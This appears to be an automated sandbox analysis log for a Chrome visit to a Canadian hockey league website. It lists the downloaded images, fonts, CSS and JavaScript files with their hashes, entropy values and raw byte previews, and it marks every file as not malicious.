                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................h............................!1.AQa.."q..2.#BRbr.........378u.......4CSVWs...$6TUcv....%(EXet..&'5DF..G.................................H..........................!1AQ.aq....."....2R..#3Bbr.....$45....CScs..............?.. .......X]c..... ..tl..3...m...J..s.Lr...+... ...O.8O(;#d.=..".9.... ........l+.....=.Ba.a].......0.x@NI......+.d.L....L..Pn.\..b..+.Y&... .&....P.LA....$.bm.6.A....U...(...$+.e^.........l...!.<"BF.bb.$$...Q0<!.`.BF.1...,.....YW....,.......YU..lY.(..n..{L..Qn..o.$... m......h....;LM....i..,....D[.!F`..*....vy..!.*. ..,(.Ra.YTS..>1f<`..A..*JA.(....."..Tl.....|!H.&..).).X..R..L!PP;."............*...VS.IL!H1 ri..).)..H0.0.S._9L!.1....8...B..B.9.H.#. ).*..s.P.}.EjN9.L!|.0.x..9.....a..&.I...x).*....G..jLH...B...I.^F!.....FB..B(E..Y...P....I.\....F..j
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):657
                                                                                                                          Entropy (8bit):7.591810933211077
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7kO/6TE1e2GxvixoW3Qz9Ws7xDfS+dc63A4QWfRq6KogMyq/Ezp+sm7:S/6QMMCz9WsFf7X5fRwIP/Ez4p
                                                                                                                          MD5:CA52040004058032766383AD85952220
                                                                                                                          SHA1:94C03000D3EC37489E95C45CD42619DB9B46E20F
                                                                                                                          SHA-256:B0B4656A158D609046BA175F0CB787875BA95BED112B65ED02EDEE08BE99DFD8
                                                                                                                          SHA-512:894754AEA62EEB791F0F6510197FFA7F00964A994E160D23ED1E2B4075F45B1C80A75CDAC522D7438F227971A4F52F77717B87279C3CFA76FD757A07A2B6467D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs................CIDATx..k.Q..O"&."..bck..E@...$j."b!i,,.._`i'BD...?.".F.Q..1.P....J....q.F.#w.YtI......?8....=.;3...p8..........6..n*.S1@............K0G.}...\7.<...._.(..8..6clEkr.@=.}.LQQ(..........g~=.(.L.4..5.ay.....0...D3.&..d.0+4.6....3.f...#J...."..Ey..S7.............C.f.r.....b.1O^.".V...$J.....~ .N.......P... ..#..v......&....b...H.].,D......U..0...>M.l\Z.-h........yC.._..Vg#..k.dw....<?BE.`Yz/....g..k+...|.?.....d.....-d..5.J4.1.e..f....o.m.,..x....|.h<...H...?..(..aV.<b5...3`..L.2Nc....Qq ...M......` A....n*.Sq...*.Pp..T.-7q..].....w..Zj.._[..Js..p8....S.IS.U.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (53752)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55012
                                                                                                                          Entropy (8bit):5.755309837462447
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:j2GWlqVWMEJ+fO39xx0Dbgjl7Kf9ROMhE:hbVWBvx2GsE
                                                                                                                          MD5:C73AF51A0C055A6F37675878F564999B
                                                                                                                          SHA1:CC02D35CF433C95D6CB66239A32D5585FC1166E3
                                                                                                                          SHA-256:8D037FB6238A749B969139D99F8A03B19A1A66899972361F4B080F01762431CC
                                                                                                                          SHA-512:F9A216239B0754049D0004C6128F8D40E14D5AA03374C650A03E45153C4522CAAF2D445011B34D6D0724F97757B369CB9C59BA13E0392668E1B6BD8D235B25F2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function O(A){return A}var V=this||self,C=function(A,U,u,T,t,I,B,J,K,v,D,Y){for(Y=D=7;;)try{if(D==17)break;else{if(D==76)return K;if(D==98)return Y=7,K;D==u?D=V.console?87:98:D==T?(Y=7,D=u):D==87?(V.console[t](v.message),D=98):D==7?(J=V.trustedTypes,K=B,D=11):D==11?D=J&&J.createPolicy?U:76:D==U&&(Y=A,K=J.createPolicy(I,{createHTML:P,createScript:P,createScriptURL:P}),D=98)}}catch(e){if(Y==7)throw e;Y==A&&(v=e,D=T)}},P=function(A){return O.call(this,A)};(0,eval)(function(A,U){return(U=C(23,13,73,40,"error","bg",null))&&A.eval(U.createScript("1"))===1?function(u){return U.createScript(u)}:function(u){return""+u}}(V)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjog
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):359
                                                                                                                          Entropy (8bit):4.754354729795499
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:a3MiKMy88hRmFaUfD32eod/ja2F3MiKN/fXqUN0y/88UyU8hRmFF32U93/pf:a3MSt8+FAeGzF3M33j0yU868+FFf93xf
                                                                                                                          MD5:9693EAD7FFF533C40FD5AFAFC909D813
                                                                                                                          SHA1:6818D103398F40078C19ADE7A9865C5B2DFB941F
                                                                                                                          SHA-256:FA4DFC4E183B9D11ABC65A04367178D7B4A5A678115919B5BBEB69134007EE6B
                                                                                                                          SHA-512:E6F5F85E7B9545EF9E3CAE823C191C925295374D324C6AEF5ED65550E8FBC1F8FD5DA7E6F06D19F7B672A64FD5C674FA2DC1009AFB08B5CF18EE098D7A074994
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.15
                                                                                                                          Preview:.wpml_cms_navigation .wpml_table th{ .. background-color: #DFDFDF;.. border-bottom:solid 1px #fff;.. width:200px; .. border-collapse: collapse; ..} ...wpml_cms_navigation .wpml_table tfoot th{.. border-bottom:none; .. background: none;.. background-color: #DFDFDF;..}....#icl_cat_menu_contents input{.. margin-bottom: 4px;..}..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3004
                                                                                                                          Entropy (8bit):4.840748144842299
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:X82GYE9l/TC/4IRxFwaBLvGJfvOYOqqvd9LwyaKC9DEADdVGRGUv7ChIQ0wJWHd:s2GT/vM6J3OYNmd983z/aPChIlUWHd
                                                                                                                          MD5:7E1007FA3B22A2DD6D76E09093990E56
                                                                                                                          SHA1:AD7E9B6BAA816EE42FD13B92051EAE5420CD8488
                                                                                                                          SHA-256:8577DF598F439B9602BFEC90EB2C2A654DBB3BD1922AD1D768D6CA3AEF58C825
                                                                                                                          SHA-512:E9BCFFA2D1B493D3FCD3552BC7290CC4A78AF05EA633C0E257F4DA729AC5CBDF1FF16D96F2F1F8FDF90BBAEAA4717A25C4BB12B7861D451DF58773F467A4F735
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.15
                                                                                                                          Preview:#menu-wrap {. width: 100%;. height: 30px;. position: relative;. z-index: 100;. /* remove all the bullets, borders and padding from the default list styling */. /* style the table so that it takes no ppart in the layout - required for IE to work */.}.#menu-wrap ul {. padding: 0;. margin: 0;. list-style-type: none;. /* float the list to make it horizontal and a relative positon so that you can control the dropdown menu positon */. /* style the links for the top level */. /* make the second level visible when hover on first level list OR link */.}.#menu-wrap ul li {. float: left;. position: relative;.}.#menu-wrap ul a,.#menu-wrap ul a:visited {. display: block;. line-height: 30px;. padding-left: 10px;. padding-right: 20px;.}.#menu-wrap ul ul {. /* hide the sub levels and give them a positon absolute so that they take up no room */. visibility: hidden;. position: absolute;. height: 0;. top: 30px;. left: 0;. width: 149px;. /* style the second level links */.}.#menu
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 149729
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):53773
                                                                                                                          Entropy (8bit):7.994997808032353
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GaYTyqDEKWBpySlghXEP7rren3O+uVRivdamt0DdaNhaFqwiezs1YC:GNHgpySy2Pa+HriQmt0ZaNuiezs2C
                                                                                                                          MD5:BB6F1FA47AC6034BC9EF9AD1D360B0CD
                                                                                                                          SHA1:5F46C93A4D024F8BC4A02A3D0B1DAC9FE5CE70C3
                                                                                                                          SHA-256:1E356ECD17C2F81E067C1892B178B0D94F42C5B9820578A32F2B94C32F1ABF3A
                                                                                                                          SHA-512:A89D0B564DA3C75D8DF3E9088CC7C1FF875F4643D237C374B4EF5F2DC69DB36611C5FA3D0FF00BA33DEDAB090EAF24AC35BA394C047740D08383048FB14BD395
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:............z...(..<...K..A-Rw5..H.Vb[.%;.e-.I.d[d7....y.y..w^l.../..d.|3;^Kl.B.PU(....Ok..V...G.....q.N.I...Cgg...N4{...8...vm...+...v<..^crR{-.........I-.../k.h k~8...)K.{.$i....[.Y..4..cYKe<M."...A...Z4.d.6..}.7.5..!V:....0u..8Mg...u...|..Qg.~4.J.d.tp.G......$.H..b.N...0.az....E1.=.`...b&.z"j....d.... ....[w[..0J...~I..O[.....x..5)R.y..G.n..1.B.!.....A=...\,.....'Ik....`.. .....L..$]....j...\.D../_,..$...UA..%`n...?..........?.rK....A....W....7._.......eb...|z.......m03%/!.}U].4.#&X...1....b.AK.. ..b...@,.j..4.4.D/..el.......3....o..Cx.%rP..3B.....o...Q...=....0.r).......~.S[........>....G.....T.......(.z(S.rU....S.)/3.}.......at...`.m...YQ...yx.G....2....PN..=.[(.....6...jp.H:..]..?k..X....4........C<.H\.2.%6.......b'U.pJ.......Q.X..!O.E........A..S...E.6...@/&...0].`.F..../Az.$ ....q.B..GXbXH,.a..... }`..........5..AG...,.......i......f...DD)..........u1...q(.... .........d.M.~.Y....!..-^X...T...S.p$.k..dD7...? U..y..`..Y.a]......D.....j....5..@.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (64561)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510147
                                                                                                                          Entropy (8bit):5.51633636669842
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:VAA8QBv6rKRulVD2xJh+ZV5rerjKcIbUtxhJePFr/tIYSDuBFf7oPz1ZNNdoa:quRuld2xIr73bUtXCr7SDuBFfsPz1ZNr
                                                                                                                          MD5:807C1D994B1601F772E569DC1924102A
                                                                                                                          SHA1:0E14FC89697C2D4467CC881596496E3012B1EA81
                                                                                                                          SHA-256:C4DC43341628FF3F8C6F411EBDBD2DAB440E758BEB666AD7467C79B1ACAC38E5
                                                                                                                          SHA-512:9CCAC008EF03668AE7321B3C39D8E729F33B3903BF02B89DA054B3D353AC8BE7D92E609D6A0D17E1CE36D2114BBE70CC2EFF21B4057FEE451A96385D191385CE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ba,ca,fa,ha,la,sa,va,
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 300x250, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):51042
                                                                                                                          Entropy (8bit):7.836981718851626
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:Voq0g38LDQUk0k4Tie2Jpbj/6ASPMqzfkP1H9BmFpoVKIMPKL23MM2xft:Vl0fLsUIGQBD6kP1iPcJft
                                                                                                                          MD5:60E065AB96E4FA2C0FF0050A5F3D4A11
                                                                                                                          SHA1:E118BB74CFA87728C92A122D281699C13D72E04B
                                                                                                                          SHA-256:010BBE30B6945FFE24CE5F09FBB11A1639B6DADEDDDE85300DC7C5A7A2EAF8D6
                                                                                                                          SHA-512:8A462C0B3C19084D29818DB23F157A5FC7B590B6C571D85E00D39824A52AC56863D128EBF39861140AD1C3A3B95E7516E854CD50602CD0B6479555B3B3DC6277
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/06/10112443/Nothers-Big-Box.jpeg
                                                                                                                          Preview:......JFIF.....H.H....4.Exif..MM.*.............................V...........^.(.......................i.........f.......H.......H..............0221....................0100.......................,...................................................................(................................3........H.......H............................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....1........n..R...Q....g...-.K...|.m.RV[iN...;..q_....._.%..A.........i..nW......c..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 320x320, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):37230
                                                                                                                          Entropy (8bit):7.983498172109513
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:VFGMgnFtDbmdCCgiKKxxaMOqDA+9wbqr6DRK0zIS:eMqPlitaMRAboi9f
                                                                                                                          MD5:424CF4D71D15D9541B3400E0F07A228B
                                                                                                                          SHA1:4E1EB5AF490CFEE7695C47D179D64EB06CAA2A81
                                                                                                                          SHA-256:A10D271DBD0DC6AE201C39EB15FA1200F9BCA58EC61C55E01116A45EA07C8D1B
                                                                                                                          SHA-512:DC03FF6E0F4A5D416EABEA72CCD88AD94F379FB662A0B0EAF6EE21029A9162187257A0B4B61D1D7256D3904293B7C83A075E4C6FC3C4BA9845BC249E5C36B78B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start-Somewhere-320x320.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C.......................................................................@.@..".........................................L..........................!.1.AQ.."aq.2..#B.....Rr....$3b.4C..c...%St......................................M........................!1.A..Q...."aq...2R...#Bb.CSs......3cr...$&....................?.......Yjt..{.@.{Y.....M...K....J..A. .#.G...g.n....%..Y.......#...A.......~...~x........._..5%.tUt4.$1.........>.L..j7.-.5%<....W._n.{...A.u..R-3.=:.BN.."....@....0hZg..#M..v............8.^..y.....#.K.._b.-{X.#....:..-o.q[K.rTB#.4..k....,=...9..&Y.K!rYDql....<.5..u.yN.I.#......#....@.E..."..;.p.x..`....F..[.?#.r..kjL..1......o.|..&..s@U..S.c.ms...0j)Hr..MR$...AN..m...<w.T...uUU9.kT?.. LA...........&..W.L...............c=dsg.&l.R+9...H...>;..8"."(1R@....@.]GD.OD..'..n.?....Y|)..1......|.%,u.Iz:...>hV_..d.........9.e2I.9.i["x...\.. (..$..`0.6C...g...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2708
                                                                                                                          Entropy (8bit):5.033241028991523
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:b6ysP3EQo51HnLeBj5MXhVB2heMhe6AheZhRyPokIJ:b6ys/fu1HijuoR8w
                                                                                                                          MD5:E619FED4DB9CEDEC2065F006D5B63713
                                                                                                                          SHA1:C3BDC5F70BF382D1122BABAB70BF89B28039946A
                                                                                                                          SHA-256:4D956A758CA48121E4434C413596334C6B0F3CDA0E622ADA0D73C41D39EDA526
                                                                                                                          SHA-512:00E5217F1A00909D9D929ED0C7479895B8A10C814A2089FCFCCD9FEE25F727F173220159D6DB1FD76408999F6013F63A5DA52B8A089EED972B00ECDFBD82E6B9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/wp-polls/polls-css.css?ver=2.7
                                                                                                                          Preview:/*.+----------------------------------------------------------------+.|.......................|.|.WordPress Plugin: WP-Polls..........|.|.Copyright (c) 2012 Lester "GaMerZ" Chan.........|.|.......................|.|.File Written By:.................|.|.- Lester "GaMerZ" Chan...............|.|.- http://lesterchan.net...............|.|.......................|.|.File Information:.................|.|.- Polls CSS File.................|.|.- wp-content/plugins/wp-polls/polls-css.css........|.|.......................|.+----------------------------------------------------------------+.*/....wp-polls-archive {../* background-color: #ffffff; */.}..wp-polls, .wp-polls-form {../* background-color: #ffffff; */.}..wp-polls ul li, .wp-polls-ul li, .wp-polls-ans ul li {..text-align: left;..background-image: none;..display: block;.}..wp-polls ul, .wp-polls-ul, .wp-polls-ans ul {..text-align: left;..list-style: none;..float: none;.}..wp-polls ul li:before, .wp-polls-ans ul li:before, #sidebar ul ul li:b
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2198
                                                                                                                          Entropy (8bit):4.887702788804177
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:gNMXECoKm0LylKm9+ySCwZHPJYMjOQ8kX6r9hgOqpoLOZV6:geZMQI+xNvnLX6r96OH
                                                                                                                          MD5:83A5704F7F896761846735075AE38FC4
                                                                                                                          SHA1:C00977191E37BC930F3DC19E63208BCBDE877EF2
                                                                                                                          SHA-256:10637FCFFC31C3FDA17C64BA0071528F0BA8C65FFFEE6DCD8EFE130BE4D4B75D
                                                                                                                          SHA-512:1F9828EB9ACA647FE233B30E66925DFBE479C1D52965769F455E4B0E41DE566B705A27590044E1DB78FC2CF466D318AF3884D3CEDDF176D9FD0FEA73FB1BC02C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/sitepress-multilingual-cms/res/js/xdomain-data.js?ver=3.3.5
                                                                                                                          Preview:/*globals jQuery, icl_vars */..(function () {.."use strict";...jQuery(document).ready(function () {...jQuery('#lang_sel a, #lang_sel_footer a, .menu-item-language a').on('click', function (event) {.....var originalUrl;....var currentUrl = window.location.href;....var targetUrl = jQuery(this).attr('href');.....if ('#' !== targetUrl && currentUrl !== targetUrl) {.....event.preventDefault();......originalUrl = jQuery(this).attr('href');.....// Filter out xdomain_data if already in the url.....originalUrl = originalUrl.replace(/&xdomain_data(=[^&]*)?(?=&|$)|xdomain_data(=[^&]*)?(&|$)/, '');.....originalUrl = originalUrl.replace(/\?$/, '');....../** @namespace icl_vars.current_language */.....jQuery.ajax({......url: icl_vars.ajax_url,......type: 'post',......dataType: 'json',......data: {.......action: 'switching_language',.......from_language: icl_vars.current_language......},......success: function (response) {.......var argsGlue;.......var url;.......var hash;.......
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 23580, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):23580
                                                                                                                          Entropy (8bit):7.990537110832721
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:384:dRkIAJ8pVwWTW5VVjdVn8+2yvAMdriCEOY0kfW9GkAPqpPHi2vUuUSzB8:dKIAJ8pVHTZ+riY9oCpPHiodUeK
                                                                                                                          MD5:E1B3B5908C9CF23DFB2B9C52B9A023AB
                                                                                                                          SHA1:FCD4136085F2A03481D9958CC6793A5ED98E714C
                                                                                                                          SHA-256:918B7DC3E2E2D015C16CE08B57BCB64D2253BAFC1707658F361E72865498E537
                                                                                                                          SHA-512:B2DA7EF768385707AFED62CA1F178EFC6AA14519762E3F270129B3AFEE4D3782CB991E6FA66B3B08A2F81FF7CABA0B4C34C726D952198B2AC4A784B36EB2A828
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2
                                                                                                                          Preview:wOF2......\........,..[...........................z.p.`..D....e........]..B..6.$..v. .....E.K...5c[R..V.Vr!.....$....@n..P.....'%.1....."A...#H:.T.6.JL.7.g..7..x....N"..,h....R3..u.T..A.._O..f=Mu.e.....0.c.0.FV.q....m;8..J.t.-.%."....*..&..2...!\....n..]Lx..:......S/F.V.rf%..#.Uk}....X.1n..V.|.O..aC ."...#..>..n.... $;.....y.5..|>...;@..Q.D........FT...r=p.Llf...J.3..{Z.. t]Rp.N..Z..7"B..,D.0s..."o..V<...#.N.WZ...m.\......Pb....#:z...B......~w.....J.ABQ.u<.8j..m..r2.....Aq.fNY...P..c.L+......v.n..yV.w......l......H...,..2.."v.......R.V.[...s......@..L....CS..'....Z.2..o......).4.H{C.%..?.%^...#.A.]..[....._&.[~1..j.P..`.......=......[.D7h..5...s......d'.....,....?...6.;....f..(M.CV.....R..q.c.....4.6.k.V.h/..........H..?u..!mq5...9@..0YA9.M..:..reS.;._......K...\..S.^.2..Fv.l~'l..U.TN*....OXv..]..`.X1w.4E.t%a...2!.c.R.............t.'Hc...2.8...K.w..p@..T*..RZ.@..)}..*'+.7s1..... . -.....E7<...C.J.D....Iw-...u...m.K.\e..>..*....7y|{........G..d13g].t.%.y<..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):598
                                                                                                                          Entropy (8bit):7.501719974470458
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/72go7lWs1HHm1mzyJKXe6uVx85RElKW0qi+:nMsZGszrXjuVx8AoW0q5
                                                                                                                          MD5:8064D67689D58831DF81F44F27F89A30
                                                                                                                          SHA1:AD7D1EAD248ADD9A2DC2FAB58B881E311636F371
                                                                                                                          SHA-256:3F6050A0FE7FB09EC571BCD45D4EAA843660C5F84D86744936FED0E1CF6D8E74
                                                                                                                          SHA-512:9EAB15FF1DF171E5DB096D04210F8FA3AD2F78526E90619311E0871DBD617904CEB6D22F917E867362EEFD766DFF42AB04D6D2E69BA3DE95CB66A5EBCEE7C74E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/gthl/favicon.ico
                                                                                                                          Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..MHTQ.....{N.c....F..U"hA.. .."7...N.6..h.B..P$A.F..qQ(D.EA.PhT~%..1.../.ax.q...}..s.9..+.'...%....X.:.. }.....I/i!..>.A.....`.&H..."S..o.\.N.....yP...VRGb.....l..']....m~....2.<&o..|"=&.y.}..XcR...|3.L...K........m.v.}.2u........T..w.Y....5C.d..:..9E.9...f.`]....L...j~..q......I{6u...!i..ALJ......)..pI.Z.....95.]...eH.U...\l..g73.......A\".z..A.....@....h...i5.Z..=$...@%6....'R.........F.,d.......+..P?D..f3........(........~......>.=a..]..VKp.l..d.....d.<.la.B...0.SZ.........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2239)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):50543
                                                                                                                          Entropy (8bit):5.286658880654905
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:N9bj01l4VlATb7k5VPRrJHDWBlT6LduiF+ndtp3NmjXsFZ/MHtsb:rj6WVZrt6v25atNDcHy
                                                                                                                          MD5:7629CAC4F079926EF505E2271BB5135F
                                                                                                                          SHA1:407E49EF5195FD899B2AF5BC74ECCF5A6232D89B
                                                                                                                          SHA-256:BF63C4491140DE87027557A7C15C741F65C83D98274347B105A06A20E05CE78D
                                                                                                                          SHA-512:E5CB0F5C9CBFF1D74E2465B678EBCFCD9EF2701E12CDA01B1ADB6F3B60BBED85B92922717F404F44EBDD9141C1E843E77E71F3533E75E4DB9D3AB374E5635289
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/**. * @license. * lodash 3.10.1 (Custom Build) lodash.com/license | Underscore.js 1.8.3 underscorejs.org/LICENSE. * Build: `lodash modern -o ./lodash.js`. */.;(function(){function n(n,t){if(n!==t){var r=null===n,e=n===w,u=n===n,o=null===t,i=t===w,f=t===t;if(n>t&&!o||!u||r&&!i&&f||e&&f)return 1;if(n<t&&!r||!f||o&&!e&&u||i&&u)return-1}return 0}function t(n,t,r){for(var e=n.length,u=r?e:-1;r?u--:++u<e;)if(t(n[u],u,n))return u;return-1}function r(n,t,r){if(t!==t)return p(n,r);r-=1;for(var e=n.length;++r<e;)if(n[r]===t)return r;return-1}function e(n){return typeof n=="function"||false}function u(n){return null==n?"":n+""}function o(n,t){for(var r=-1,e=n.length;++r<e&&-1<t.indexOf(n.charAt(r)););.return r}function i(n,t){for(var r=n.length;r--&&-1<t.indexOf(n.charAt(r)););return r}function f(t,r){return n(t.a,r.a)||t.b-r.b}function a(n){return Nn[n]}function c(n){return Tn[n]}function l(n,t,r){return t?n=Bn[n]:r&&(n=Dn[n]),"\\"+n}function s(n){return"\\"+Dn[n]}function p(n,t,r){var e=n.leng
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):598
                                                                                                                          Entropy (8bit):7.501719974470458
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/72go7lWs1HHm1mzyJKXe6uVx85RElKW0qi+:nMsZGszrXjuVx8AoW0q5
                                                                                                                          MD5:8064D67689D58831DF81F44F27F89A30
                                                                                                                          SHA1:AD7D1EAD248ADD9A2DC2FAB58B881E311636F371
                                                                                                                          SHA-256:3F6050A0FE7FB09EC571BCD45D4EAA843660C5F84D86744936FED0E1CF6D8E74
                                                                                                                          SHA-512:9EAB15FF1DF171E5DB096D04210F8FA3AD2F78526E90619311E0871DBD617904CEB6D22F917E867362EEFD766DFF42AB04D6D2E69BA3DE95CB66A5EBCEE7C74E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..MHTQ.....{N.c....F..U"hA.. .."7...N.6..h.B..P$A.F..qQ(D.EA.PhT~%..1.../.ax.q...}..s.9..+.'...%....X.:.. }.....I/i!..>.A.....`.&H..."S..o.\.N.....yP...VRGb.....l..']....m~....2.<&o..|"=&.y.}..XcR...|3.L...K........m.v.}.2u........T..w.Y....5C.d..:..9E.9...f.`]....L...j~..q......I{6u...!i..ALJ......)..pI.Z.....95.]...eH.U...\l..g73.......A\".z..A.....@....h...i5.Z..=$...@%6....'R.........F.,d.......+..P?D..f3........(........~......>.=a..]..VKp.l..d.....d.<.la.B...0.SZ.........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:GIF image data, version 89a, 300 x 250
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114750
                                                                                                                          Entropy (8bit):7.957381083965845
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:LsCYtLpWdEFHu82Qmo7i8AraHBO22uBMAmvHqUb3AI1b69RQOTWmFIBFYIB2kqZQ:AMKOv6B1H022uRvs1b69uOvFNIHAaNf
                                                                                                                          MD5:4028A902FD738BCBFF571168CAC7CC91
                                                                                                                          SHA1:AEE0010CF53F7B0C25E781D889AFD48632F2F5F2
                                                                                                                          SHA-256:1CF2D38A87F7103759B0FB707593291F620B580F44ADBD79A4C689D4F75B732E
                                                                                                                          SHA-512:8D0C4E92CD180DA5FDDE6ABAF599BBE39AB6AC47FAC0CACFD6AE3CFAEA94CA47F1E222B4BBCE436CD38306B8499D53CAD0C7FBD67E3D26ABD3EFC681CFD07000
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
